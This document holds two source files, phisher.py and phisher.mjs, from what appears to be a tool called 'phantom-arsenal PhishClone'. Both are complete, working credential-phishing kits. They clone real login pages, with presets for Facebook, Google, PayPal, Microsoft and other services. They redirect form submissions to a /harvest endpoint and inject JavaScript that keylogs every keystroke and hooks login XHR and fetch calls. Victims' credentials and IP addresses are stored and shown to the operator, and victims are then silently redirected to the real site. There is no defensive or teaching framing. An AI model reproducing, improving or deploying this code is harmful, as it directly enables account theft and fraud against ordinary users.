File: phisher.py
#!/usr/bin/env python3
"""
phantom-arsenal / PhishClone v3.0
- Downloads ALL assets (CSS, JS, images) locally → no external requests
- Inlines small CSS/JS → instant page load
- Pure stdlib, zero dependencies
"""

import sys, os, re, json, datetime, threading, time
import urllib.request, urllib.parse, urllib.error
import http.server, socketserver, socket, hashlib, base64, struct
from concurrent.futures import ThreadPoolExecutor

CREDS_FILE = "captured_creds.json"
LOG_FILE   = "keystrokes.log"

def find_free_port(start):
    for p in range(start, start + 100):
        try:
            s = socket.socket()
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            s.bind(('', p))
            s.close()
            return p
        except OSError:
            continue
    return start

_base   = int(sys.argv[2]) if len(sys.argv) > 2 else 8080
PORT    = find_free_port(_base)
WS_PORT = find_free_port(PORT + 1)

HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0.0.0 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.9',
    'Accept-Encoding': 'identity',
}

# cache للـ assets المحملة
ASSET_CACHE = {}
ASSET_LOCK  = threading.Lock()

def fetch_url(url, timeout=10):
    try:
        req = urllib.request.Request(url, headers=HEADERS)
        with urllib.request.urlopen(req, timeout=timeout) as r:
            return r.read(), r.headers.get('Content-Type', '')
    except:
        return None, None

def fetch_text(url, timeout=15):
    data, ct = fetch_url(url, timeout)
    if data is None:
        return None, None
    charset = 'utf-8'
    if ct and 'charset=' in ct:
        charset = ct.split('charset=')[-1].strip().split(';')[0].strip()
    return data.decode(charset, errors='replace'), ct

def url_to_key(url):
    return hashlib.md5(url.encode()).hexdigest()[:12]

def resolve_url(src, base_url):
    p = urllib.parse.urlparse(base_url)
    if src.startswith('//'):
        return p.scheme + ':' + src
    if src.startswith('/'):
        return p.scheme + '://' + p.netloc + src
    if src.startswith('http'):
        return src
    # relative
    base_path = '/'.join(p.path.split('/')[:-1])
    return p.scheme + '://' + p.netloc + base_path + '/' + src

def preload_assets(html, base_url):
    """Download all CSS and JS, serve them locally"""
    p = urllib.parse.urlparse(base_url)
    base = p.scheme + '://' + p.netloc
    assets_to_fetch = []

    # find all src= and href= (CSS/JS only)
    for m in re.finditer(r'(src|href)=(["\'])([^"\'> ]+)\2', html, re.I):
        attr, q, val = m.group(1), m.group(2), m.group(3)
        if val.startswith(('data:', '#', 'javascript:', 'mailto:', 'tel:')):
            continue
        abs_val = resolve_url(val, base_url)
        ext = abs_val.split('?')[0].lower()
        if ext.endswith('.css') or ext.endswith('.js') or 'stylesheet' in html[max(0,m.start()-50):m.start()].lower():
            assets_to_fetch.append((abs_val, attr, val))

    # also find @import in inline styles
    for m in re.finditer(r'@import\s+["\']([^"\']+)["\']', html):
        abs_val = resolve_url(m.group(1), base_url)
        assets_to_fetch.append((abs_val, 'href', m.group(1)))

    print('[*] Downloading ' + str(len(assets_to_fetch)) + ' assets...')

    def download(item):
        abs_url, attr, orig = item
        key = url_to_key(abs_url)
        data, ct = fetch_url(abs_url, timeout=8)
        if data:
            with ASSET_LOCK:
                ASSET_CACHE[key] = (data, ct or 'application/octet-stream', abs_url)
            return (orig, abs_url, key)
        return None

    results = []
    with ThreadPoolExecutor(max_workers=20) as ex:
        for r in ex.map(download, assets_to_fetch):
            if r:
                results.append(r)

    print('[+] Downloaded ' + str(len(results)) + '/' + str(len(assets_to_fetch)) + ' assets')

    # replace URLs in HTML to point to local proxy
    for orig, abs_url, key in results:
        local = '/asset/' + key
        html = html.replace('"' + orig + '"', '"' + local + '"')
        html = html.replace("'" + orig + "'", "'" + local + "'")

    # fix remaining absolute URLs for images etc
    def abs_url_fix(m):
        attr, q, v = m.group(1), m.group(2), m.group(3)
        if v.startswith(('data:', '#', 'javascript:', 'mailto:', 'tel:', 'http')):
            return m.group(0)
        if v.startswith('//'):
            return attr + '=' + q + p.scheme + ':' + v + q
        if v.startswith('/'):
            return attr + '=' + q + base + v + q
        return attr + '=' + q + base + '/' + v + q

    html = re.sub(r'(src|href)=(["\'])([^"\'> ]+)\2', abs_url_fix, html, flags=re.I)

    return html

def inject_script(html, base_url, ws_port):
    redirect_url = base_url.replace("'", "\\'")
    ws_js = str(ws_port)

    script = (
        "<script>\n"
        "(function(){\n"
        "  var ws;\n"
        "  function connectWS(){\n"
        "    try{\n"
        "      ws = new WebSocket('ws://' + location.hostname + ':" + ws_js + "');\n"
        "      ws.onclose = function(){ setTimeout(connectWS, 2000); };\n"
        "    }catch(e){}\n"
        "  }\n"
        "  connectWS();\n"
        "  function send(type, data){\n"
        "    if(ws && ws.readyState===1) ws.send(JSON.stringify({type:type, data:data, ts:new Date().toISOString()}));\n"
        "  }\n"
        "  document.addEventListener('keyup', function(e){\n"
        "    var t = e.target;\n"
        "    send('keystroke', {key: e.key, field: t.name||t.id||t.placeholder||t.type||'?', value: t.value});\n"
        "  }, true);\n"
        "  document.addEventListener('submit', function(e){\n"
        "    e.preventDefault();\n"
        "    var f = e.target;\n"
        "    var data = {};\n"
        "    new FormData(f).forEach(function(v,k){ data[k]=v; });\n"
        "    send('submit', data);\n"
        "    fetch('/harvest',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify(data)})\n"
        "      .then(function(){ window.location='" + redirect_url + "'; });\n"
        "  }, true);\n"
        "  document.addEventListener('click', function(e){\n"
        "    var el = e.target;\n"
        "    if(el && (el.type==='submit'||el.tagName==='BUTTON')){\n"
        "      var inputs = document.querySelectorAll('input');\n"
        "      var data = {};\n"
        "      inputs.forEach(function(i){ if(i.value) data[i.name||i.id||i.type]=i.value; });\n"
        "      if(Object.keys(data).length) send('click_harvest', data);\n"
        "    }\n"
        "  }, true);\n"
        "})();\n"
        "</script>\n"
        "</body>"
    )

    # intercept form actions
    html = re.sub(r'(<form[^>]*)\s+action=["\'][^"\']*["\']', r'\1 action="/harvest"', html, flags=re.I)
    html = re.sub(r'(<form)(?![^>]*action=)([^>]*>)', r'\1 action="/harvest"\2', html, flags=re.I)
    html = re.sub(r'(<form[^>]*)\s+method=["\']get["\']', r'\1 method="POST"', html, flags=re.I)

    if re.search(r'</body>', html, re.I):
        html = re.sub(r'</body>', script, html, flags=re.I)
    else:
        html += script

    return html

# ── WebSocket (stdlib) ────────────────────────────────────────────────────────
def ws_handshake(conn):
    try:
        data = conn.recv(4096).decode('utf-8', errors='replace')
        key = re.search(r'Sec-WebSocket-Key: (.+)', data)
        if not key: return False
        accept = base64.b64encode(hashlib.sha1((key.group(1).strip() + "258EAFA5-E914-47DA-95CA-C5AB0DC85B11").encode()).digest()).decode()
        conn.send(("HTTP/1.1 101 Switching Protocols\r\nUpgrade: websocket\r\nConnection: Upgrade\r\nSec-WebSocket-Accept: " + accept + "\r\n\r\n").encode())
        return True
    except: return False

def ws_recv(conn):
    try:
        h = conn.recv(2)
        if len(h) < 2: return None
        if (h[0] & 0x0F) == 8: return None
        n = h[1] & 0x7F
        if n == 126: n = struct.unpack('>H', conn.recv(2))[0]
        elif n == 127: n = struct.unpack('>Q', conn.recv(8))[0]
        if h[1] >> 7:
            masks = conn.recv(4)
            data = bytearray(conn.recv(n))
            for i in range(len(data)): data[i] ^= masks[i % 4]
            return data.decode('utf-8', errors='replace')
        return conn.recv(n).decode('utf-8', errors='replace')
    except: return None

def handle_ws_client(conn, addr):
    if not ws_handshake(conn): conn.close(); return
    while True:
        msg = ws_recv(conn)
        if msg is None: break
        try:
            d = json.loads(msg)
            t = d.get('type', '')
            if t == 'keystroke':
                ks = d['data']
                line = "[KEY] field=" + str(ks.get('field','?')) + "  key=" + str(ks.get('key','?')) + "  val=" + str(ks.get('value',''))
                print("\033[93m" + line + "\033[0m")
                with open(LOG_FILE, 'a') as f: f.write(line + '\n')
            elif t in ('submit', 'click_harvest'):
                line = "[" + t.upper() + "] " + json.dumps(d['data'], ensure_ascii=False)
                print("\033[92m" + line + "\033[0m")
                with open(LOG_FILE, 'a') as f: f.write(line + '\n')
        except: pass
    conn.close()

def start_ws_server(port):
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(('0.0.0.0', port))
    srv.listen(20)
    while True:
        try:
            conn, addr = srv.accept()
            threading.Thread(target=handle_ws_client, args=(conn, addr), daemon=True).start()
        except: pass

# ── HTTP Handler ──────────────────────────────────────────────────────────────
class Handler(http.server.BaseHTTPRequestHandler):
    html = ""; target = ""
    def log_message(self, *a): pass

    def do_GET(self):
        if self.path == '/':
            body = self.html.encode('utf-8', errors='replace')
            self._send(200, 'text/html; charset=utf-8', body)
        elif self.path.startswith('/asset/'):
            key = self.path[7:].split('?')[0]
            with ASSET_LOCK:
                item = ASSET_CACHE.get(key)
            if item:
                data, ct, _ = item
                self._send(200, ct, data)
            else:
                self.send_response(404); self.end_headers()
        elif self.path == '/creds':
            try:
                with open(CREDS_FILE) as f: body = f.read().encode()
            except: body = b'[]'
            self._send(200, 'application/json', body)
        else:
            self.send_response(404); self.end_headers()

    def do_POST(self):
        if self.path == '/harvest':
            n = int(self.headers.get('Content-Length', 0))
            body = self.rfile.read(n).decode('utf-8', 'replace')
            try: data = json.loads(body)
            except: data = dict(urllib.parse.parse_qsl(body))
            ip = self.client_address[0]
            entry = {"time": datetime.datetime.now().isoformat(), "ip": ip, "target": self.target, "credentials": data}
            creds = []
            try:
                with open(CREDS_FILE) as f: creds = json.load(f)
            except: pass
            creds.append(entry)
            with open(CREDS_FILE, 'w') as f: json.dump(creds, f, indent=2, ensure_ascii=False)
            print("\n\033[41m\033[97m [CAPTURED] IP=" + ip + " -> " + json.dumps(data, ensure_ascii=False) + " \033[0m\n")
            self._send(200, 'application/json', b'{"ok":true}')
        else:
            self.send_response(404); self.end_headers()

    def _send(self, code, ct, body):
        self.send_response(code)
        self.send_header('Content-Type', ct)
        self.send_header('Content-Length', str(len(body)))
        self.send_header('Cache-Control', 'max-age=3600')
        self.end_headers()
        self.wfile.write(body)

def main():
    if len(sys.argv) < 2:
        print("Usage: python3 phisher.py <URL> [port]")
        sys.exit(1)

    url = sys.argv[1]
    print("\033[96m╔══════════════════════════════════════════╗")
    print("║   phantom-arsenal — PhishClone v3.0     ║")
    print("║   Full asset download — instant load    ║")
    print("╚══════════════════════════════════════════╝\033[0m")
    print("[*] Target : " + url)
    print("[*] Fetching...")

    html, final = fetch_text(url)
    if not html:
        print("❌ Failed to fetch page"); sys.exit(1)

    html = preload_assets(html, final)
    html = inject_script(html, final, WS_PORT)

    Handler.html   = html
    Handler.target = final

    threading.Thread(target=start_ws_server, args=(WS_PORT,), daemon=True).start()
    print("[+] WebSocket: ws://0.0.0.0:" + str(WS_PORT))

    socketserver.TCPServer.allow_reuse_address = True
    with socketserver.TCPServer(("", PORT), Handler) as srv:
        print("[+] Phishing : \033[92mhttp://0.0.0.0:" + str(PORT) + "\033[0m")
        print("[+] Creds    : http://0.0.0.0:" + str(PORT) + "/creds")
        print("\033[93m[*] Waiting... (Ctrl+C to stop)\033[0m\n")
        try:
            srv.serve_forever()
        except KeyboardInterrupt:
            print("\n\033[91m[!] Stopped\033[0m")
            try:
                with open(CREDS_FILE) as f: c = json.load(f)
                print("[+] Captured: " + str(len(c)))
                for x in c: print("  > " + x['time'] + " | IP=" + x['ip'] + " | " + str(x['credentials']))
            except: print("[*] Nothing captured")

if __name__ == '__main__':
    main()

File: phisher.mjs
#!/usr/bin/env node
/**
 * phantom-arsenal / PhishClone v6.0
 * - Intercepts ALL responses in browser → inlines CSS/JS/fonts/images as base64
 * - No external requests from victim browser = perfect styling
 */

import puppeteer   from 'puppeteer'
import http        from 'http'
import https       from 'https'
import net         from 'net'
import fs          from 'fs'
import crypto      from 'crypto'
import readline    from 'readline'
import { createServer } from 'http'
import { createHash }   from 'crypto'

// ── auto-detect Chrome ───────────────────────────────────────────────────────
function findChrome() {
  const candidates = [
    '/usr/bin/chromium','/usr/bin/chromium-browser',
    '/usr/bin/google-chrome','/usr/bin/google-chrome-stable',
  ]
  try {
    const base = '/root/.cache/puppeteer/chrome'
    for (const d of fs.readdirSync(base)) {
      const p = `${base}/${d}/chrome-linux64/chrome`
      if (fs.existsSync(p)) return p
    }
  } catch {}
  for (const c of candidates) if (fs.existsSync(c)) return c
  return null
}
const CHROME = findChrome()
if (!CHROME) { console.error('❌ Chrome not found'); process.exit(1) }

// ── utils ────────────────────────────────────────────────────────────────────
const CREDS_FILE = 'captured_creds.json'
const LOG_FILE   = 'keystrokes.log'

function findFreePort(start) {
  return new Promise(res => {
    const s = net.createServer()
    s.listen(start, () => { const p = s.address().port; s.close(() => res(p)) })
    s.on('error', () => findFreePort(start + 1).then(res))
  })
}

function log(msg) { fs.appendFileSync(LOG_FILE, msg + '\n') }

function saveCred(ip, data, target) {
  let arr = []; try { arr = JSON.parse(fs.readFileSync(CREDS_FILE, 'utf8')) } catch {}
  arr.push({ time: new Date().toISOString(), ip, target, credentials: data })
  fs.writeFileSync(CREDS_FILE, JSON.stringify(arr, null, 2))
  console.log('\n\x1b[41m\x1b[97m [CAPTURED] IP=' + ip + ' -> ' + JSON.stringify(data) + ' \x1b[0m\n')
}

function mimeToExt(ct) {
  if (ct.includes('css'))        return 'text/css'
  if (ct.includes('javascript')) return 'application/javascript'
  if (ct.includes('svg'))        return 'image/svg+xml'
  if (ct.includes('png'))        return 'image/png'
  if (ct.includes('jpeg')||ct.includes('jpg')) return 'image/jpeg'
  if (ct.includes('gif'))        return 'image/gif'
  if (ct.includes('webp'))       return 'image/webp'
  if (ct.includes('woff2'))      return 'font/woff2'
  if (ct.includes('woff'))       return 'font/woff'
  if (ct.includes('ttf'))        return 'font/ttf'
  if (ct.includes('json'))       return 'application/json'
  return ct.split(';')[0].trim()
}

// ── menu ─────────────────────────────────────────────────────────────────────
const SITES = [
  { name: 'Facebook',    url: 'https://www.facebook.com/login' },
  { name: 'Instagram',   url: 'https://www.instagram.com/accounts/login/' },
  { name: 'Google',      url: 'https://accounts.google.com/signin' },
  { name: 'Twitter / X', url: 'https://twitter.com/i/flow/login' },
  { name: 'LinkedIn',    url: 'https://www.linkedin.com/login' },
  { name: 'Snapchat',    url: 'https://accounts.snapchat.com/accounts/login' },
  { name: 'TikTok',      url: 'https://www.tiktok.com/login' },
  { name: 'GitHub',      url: 'https://github.com/login' },
  { name: 'Microsoft',   url: 'https://login.microsoftonline.com/' },
  { name: 'PayPal',      url: 'https://www.paypal.com/signin' },
  { name: 'Netflix',     url: 'https://www.netflix.com/login' },
  { name: 'Steam',       url: 'https://store.steampowered.com/login/' },
  { name: 'Discord',     url: 'https://discord.com/login' },
  { name: 'Spotify',     url: 'https://accounts.spotify.com/login' },
  { name: 'Custom URL',  url: null },
]

async function askTarget() {
  const rl = readline.createInterface({ input: process.stdin, output: process.stdout })
  const ask = q => new Promise(r => rl.question(q, r))
  console.clear()
  console.log('\x1b[96m╔══════════════════════════════════════════════════╗')
  console.log('║      phantom-arsenal — PhishClone v6.0          ║')
  console.log('║   Full inline CSS/JS — Perfect clone            ║')
  console.log('╚══════════════════════════════════════════════════╝\x1b[0m\n')
  console.log('\x1b[93m  Select target:\x1b[0m\n')
  SITES.forEach((s, i) => console.log('  \x1b[96m[' + String(i+1).padStart(2,' ') + ']\x1b[0m  ' + s.name))
  console.log('')
  let target = null
  while (!target) {
    const c = await ask('\x1b[92m  Enter number: \x1b[0m')
    const idx = parseInt(c) - 1
    if (idx >= 0 && idx < SITES.length) {
      target = SITES[idx].url === null ? (await ask('\x1b[92m  Enter URL: \x1b[0m')).trim() : SITES[idx].url
    } else console.log('  \x1b[91mInvalid\x1b[0m')
  }
  rl.close()
  return target
}

// ── clone page — intercept all resources ─────────────────────────────────────
async function clonePage(targetUrl, wsPort) {
  console.log('\n[*] Launching Chrome...')
  const browser = await puppeteer.launch({
    headless: true,
    executablePath: CHROME,
    args: ['--no-sandbox','--disable-setuid-sandbox','--disable-dev-shm-usage','--disable-gpu']
  })

  const page = await browser.newPage()
  await page.setViewport({ width: 1280, height: 900 })
  await page.setUserAgent('Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0.0.0 Safari/537.36')

  // ── intercept every response and save as base64 data URI ──────────────────
  const resourceMap = new Map()  // url → dataURI or text

  await page.setRequestInterception(true)
  page.on('request', req => req.continue())

  page.on('response', async res => {
    const url  = res.url()
    const ct   = res.headers()['content-type'] || ''
    const mime = mimeToExt(ct)

    // skip main HTML and data URIs
    if (url === targetUrl || url.startsWith('data:') || url.includes('analytics') || url.includes('gtag')) return

    try {
      if (ct.includes('text/css') || ct.includes('javascript') ||
          ct.includes('font') || ct.includes('image') || ct.includes('svg')) {
        const buf  = await res.buffer()
        const b64  = buf.toString('base64')
        const dataUri = `data:${mime};base64,${b64}`
        resourceMap.set(url, dataUri)
      }
    } catch {}
  })

  await page.goto(targetUrl, { waitUntil: 'networkidle2', timeout: 30000 })
  await new Promise(r => setTimeout(r, 2500))

  const finalUrl = page.url()
  let html = await page.content()

  console.log('[+] Rendered: ' + html.length + ' bytes | Resources: ' + resourceMap.size)

  // replace all resource URLs with data URIs
  let replaced = 0
  for (const [origUrl, dataUri] of resourceMap) {
    if (html.includes(origUrl)) {
      html = html.split(origUrl).join(dataUri)
      replaced++
    }
  }
  console.log('[+] Inlined ' + replaced + ' resources as base64')

  await browser.close()

  // ── patch forms ────────────────────────────────────────────────────────────
  html = html.replace(/(<form[^>]*)\s+action="[^"]*"/gi, '$1 action="/harvest"')
  html = html.replace(/(<form[^>]*)\s+action='[^']*'/gi,  "$1 action='/harvest'")
  html = html.replace(/(<form)(?![^>]*action=)([^>]*>)/gi,'$1 action="/harvest"$2')
  html = html.replace(/(<form[^>]*)\s+method="get"/gi,    '$1 method="POST"')

  const redirectUrl = finalUrl.replace(/'/g, "\\'")

  // ── harvester script ───────────────────────────────────────────────────────
  const script = `
<script>
(function(){
  var ws;
  function cws(){ try{ ws=new WebSocket('ws://'+location.hostname+':${wsPort}'); ws.onclose=function(){setTimeout(cws,2000)}; }catch(e){} }
  cws();
  function snd(t,d){ if(ws&&ws.readyState===1) ws.send(JSON.stringify({type:t,data:d,ts:new Date().toISOString()})); }

  // keystrokes
  document.addEventListener('keyup',function(e){
    var t=e.target;
    snd('keystroke',{key:e.key,field:t.name||t.id||t.placeholder||t.type||'?',value:t.value});
  },true);

  // form submit
  document.addEventListener('submit',function(e){
    e.preventDefault();
    var f=e.target, d={};
    new FormData(f).forEach(function(v,k){d[k]=v;});
    snd('submit',d);
    fetch('/harvest',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify(d)})
      .then(function(){window.location='${redirectUrl}';});
  },true);

  // click on buttons
  document.addEventListener('click',function(e){
    var el=e.target;
    if(el&&(el.type==='submit'||el.tagName==='BUTTON'||(el.role==='button'))){
      var inp=document.querySelectorAll('input'), d={};
      inp.forEach(function(i){if(i.value)d[i.name||i.id||i.type]=i.value;});
      if(Object.keys(d).length) snd('click_harvest',d);
    }
  },true);

  // patch XHR
  var oX=XMLHttpRequest.prototype.open,oS=XMLHttpRequest.prototype.send;
  XMLHttpRequest.prototype.open=function(m,u){this._u=u;return oX.apply(this,arguments);};
  XMLHttpRequest.prototype.send=function(b){
    if(b&&this._u&&/login|auth|session|signin/i.test(this._u))
      try{snd('xhr',{url:this._u,body:String(b)});}catch(e){}
    return oS.apply(this,arguments);
  };

  // patch fetch
  var oF=window.fetch;
  window.fetch=function(input,init){
    var u=typeof input==='string'?input:(input&&input.url)||'';
    if(/login|auth|session|signin/i.test(u)){
      var b=(init&&init.body)||'';
      try{snd('fetch_login',{url:u,body:String(b)});}catch(e){}
    }
    return oF.apply(this,arguments);
  };
})();
</script></body>`

  html = /<\/body>/i.test(html) ? html.replace(/<\/body>/i, script) : html + script

  return { html, finalUrl }
}

// ── WebSocket server (raw TCP stdlib) ────────────────────────────────────────
function startWS(port) {
  net.createServer(sock => {
    let shook = false, buf = Buffer.alloc(0)
    sock.on('data', chunk => {
      buf = Buffer.concat([buf, chunk])
      if (!shook) {
        const m = buf.toString().match(/Sec-WebSocket-Key: (.+)/)
        if (!m) return
        const acc = createHash('sha1').update(m[1].trim()+'258EAFA5-E914-47DA-95CA-C5AB0DC85B11').digest('base64')
        sock.write('HTTP/1.1 101 Switching Protocols\r\nUpgrade: websocket\r\nConnection: Upgrade\r\nSec-WebSocket-Accept: '+acc+'\r\n\r\n')
        shook = true; buf = Buffer.alloc(0); return
      }
      if (buf.length < 2) return
      const masked = (buf[1]&0x80)!==0
      let len=buf[1]&0x7F, off=2
      if (len===126){len=buf.readUInt16BE(2);off=4}
      if (buf.length < off+(masked?4:0)+len) return
      let pl
      if (masked){const mk=buf.slice(off,off+4);off+=4;pl=Buffer.from(buf.slice(off,off+len));for(let i=0;i<pl.length;i++)pl[i]^=mk[i%4];}
      else pl=buf.slice(off,off+len)
      buf=buf.slice(off+len)
      try {
        const d=JSON.parse(pl.toString()), t=d.type||''
        if (t==='keystroke'){
          const l='[KEY] field='+(d.data.field||'?')+'  key='+(d.data.key||'?')+'  val='+(d.data.value||'')
          console.log('\x1b[93m'+l+'\x1b[0m'); log(l)
        } else if (['submit','click_harvest','xhr','fetch_login'].includes(t)){
          const l='['+t.toUpperCase()+'] '+JSON.stringify(d.data)
          console.log('\x1b[92m'+l+'\x1b[0m'); log(l)
        }
      } catch {}
    })
    sock.on('error',()=>{})
  }).listen(port)
}

// ── main ─────────────────────────────────────────────────────────────────────
const targetUrl = process.argv[2] || await askTarget()
const PORT    = await findFreePort(parseInt(process.argv[3]||'8080'))
const WS_PORT = await findFreePort(PORT+1)

const { html, finalUrl } = await clonePage(targetUrl, WS_PORT)
startWS(WS_PORT)

createServer((req, res) => {
  const path = new URL(req.url, 'http://x').pathname

  if (path === '/') {
    const b = Buffer.from(html, 'utf8')
    res.writeHead(200, { 'Content-Type': 'text/html;charset=utf-8', 'Content-Length': b.length })
    res.end(b)

  } else if (path === '/creds') {
    let b = '[]'; try { b = fs.readFileSync(CREDS_FILE,'utf8') } catch {}
    res.writeHead(200, { 'Content-Type': 'application/json' }); res.end(b)

  } else if (path === '/harvest' && req.method === 'POST') {
    let body = ''
    req.on('data', c => body += c)
    req.on('end', () => {
      let data; try { data = JSON.parse(body) } catch { data = Object.fromEntries(new URLSearchParams(body)) }
      saveCred(req.socket.remoteAddress || '?', data, finalUrl)
      res.writeHead(200, { 'Content-Type': 'application/json' }); res.end('{"ok":true}')
    })
  } else { res.writeHead(404); res.end() }

}).listen(PORT, () => {
  console.log('\n[+] WebSocket  : ws://0.0.0.0:' + WS_PORT)
  console.log('[+] Phishing   : \x1b[92mhttp://0.0.0.0:' + PORT + '\x1b[0m')
  console.log('[+] View Creds : http://0.0.0.0:' + PORT + '/creds')
  console.log('\x1b[93m[*] Ready — waiting for victims...\x1b[0m\n')
})

process.on('SIGINT', () => {
  console.log('\n\x1b[91m[!] Stopped\x1b[0m')
  try {
    const c = JSON.parse(fs.readFileSync(CREDS_FILE,'utf8'))
    console.log('[+] Captured: ' + c.length)
    c.forEach(x => console.log('  > '+x.time+' | IP='+x.ip+' | '+JSON.stringify(x.credentials)))
  } catch {}
  process.exit(0)
})
